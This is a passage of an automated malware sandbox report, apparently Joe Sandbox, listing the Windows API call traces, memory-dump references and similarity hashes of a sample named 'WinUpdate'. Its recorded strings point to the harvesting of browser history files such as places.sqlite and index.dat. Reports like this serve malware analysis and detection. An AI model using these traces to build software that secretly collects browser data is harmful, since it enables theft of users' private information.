                                                                                                                                                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                                                                                • String ID: $$8
                                                                                                                                                                                                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1979745280-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                                                                                • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                                                                                • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                                                                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                                                • String ID: }A
                                                                                                                                                                                                                                                                                                • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                                                                                                • String ID: BINARY
                                                                                                                                                                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                • String ID: /stext
                                                                                                                                                                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                • String ID: .#v
                                                                                                                                                                                                                                                                                                • API String ID: 2081463915-507759092
                                                                                                                                                                                                                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2445788494-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
